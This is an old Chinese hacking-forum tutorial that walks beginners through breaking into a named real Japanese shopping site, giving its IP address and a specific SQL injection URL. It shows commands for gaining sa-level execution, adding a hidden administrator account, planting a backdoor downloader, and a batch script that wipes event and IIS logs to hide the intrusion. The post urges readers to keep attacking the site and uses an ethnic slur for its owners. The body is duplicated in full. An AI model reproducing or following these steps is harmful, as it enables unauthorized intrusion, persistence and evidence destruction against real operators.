公告区
发送消息
| 主题 | |
| 正文 | |
系统提示
| 已经成功发送消息 |
系统提示
| 已经成功加为好友 |
系统提示
| 已经成功阻止 |
2006-08-24 16:05:17
目标:http://www.soundhouse.co.jp 日本网站
ip地址:210.143.133.210
图一
老方法用啊D找注入点,出来了
注入点: http://www.soundhouse.co.jp/shop/ProductDetail.asp?Item=161^SCX25
图二
拿NBSI来检测,是sa权限.
图三
用Commander来执行命令
图四
dir c:\ 来查看c盘的内容
图五
我们用命令netstat -an 来查看它都开了哪些端口,好的,开了3389,如果没开,你可以上传个开
3389的工
具给它开开。然后你可以建个用户,用来3389登陆主机,命令是:
net user 用户名 密码 /add
net localgroup administrators 用户名 /add
我就不建了
图六
来留个后门,用MSSQL上传利用工具传个下栽者,当然,你也可以用其它方法来上传,如:脚本上
传,ftp上传,tftp上传等。方法很多,网上有很多关于上传的教程,我就不细讲了。
图七
图八
最后别忘了擦屁屁,擦屁屁工具常用的有阿榕的LogKiller.exe,这个工具可以把对方的所有日志都删
除,
包括"应用程序日志","安全日志"和"系统日志",IIS的FTP服务,IIS的SMTP服务日志和IIS的WWW服
务日志,
以及计划任务日志等日志.
你也可以自己编个批处理,内容如下:
@del %SystemRoot%\system32\logfiles*.*
@del %SystemRoot%\system32\config*.evt
@del %SystemRoot%\system32\dtclog*.*
@del %SystemRoot%\system32\*.log
@del %SystemRoot%\system32\*.txt
@del %SystemRoot%\*.txt
@del %SystemRoot%\*.log
@del del.bat
有兴趣的朋友可以继续渗透,找到它的web根目录,小日本的网站,你看着办,嘎嘎。
新手可以照着做,老鸟欢迎跟帖。
请不要修改注入点,方便新手学习哟。
ip地址:210.143.133.210
图一
老方法用啊D找注入点,出来了
注入点: http://www.soundhouse.co.jp/shop/ProductDetail.asp?Item=161^SCX25
图二
拿NBSI来检测,是sa权限.
图三
用Commander来执行命令
图四
dir c:\ 来查看c盘的内容
图五
我们用命令netstat -an 来查看它都开了哪些端口,好的,开了3389,如果没开,你可以上传个开
3389的工
具给它开开。然后你可以建个用户,用来3389登陆主机,命令是:
net user 用户名 密码 /add
net localgroup administrators 用户名 /add
我就不建了
图六
来留个后门,用MSSQL上传利用工具传个下栽者,当然,你也可以用其它方法来上传,如:脚本上
传,ftp上传,tftp上传等。方法很多,网上有很多关于上传的教程,我就不细讲了。
图七
图八
最后别忘了擦屁屁,擦屁屁工具常用的有阿榕的LogKiller.exe,这个工具可以把对方的所有日志都删
除,
包括"应用程序日志","安全日志"和"系统日志",IIS的FTP服务,IIS的SMTP服务日志和IIS的WWW服
务日志,
以及计划任务日志等日志.
你也可以自己编个批处理,内容如下:
@del %SystemRoot%\system32\logfiles*.*
@del %SystemRoot%\system32\config*.evt
@del %SystemRoot%\system32\dtclog*.*
@del %SystemRoot%\system32\*.log
@del %SystemRoot%\system32\*.txt
@del %SystemRoot%\*.txt
@del %SystemRoot%\*.log
@del del.bat
有兴趣的朋友可以继续渗透,找到它的web根目录,小日本的网站,你看着办,嘎嘎。
新手可以照着做,老鸟欢迎跟帖。
请不要修改注入点,方便新手学习哟。
·上一篇:大量有漏洞站点 学习用
·下一篇:黑客守则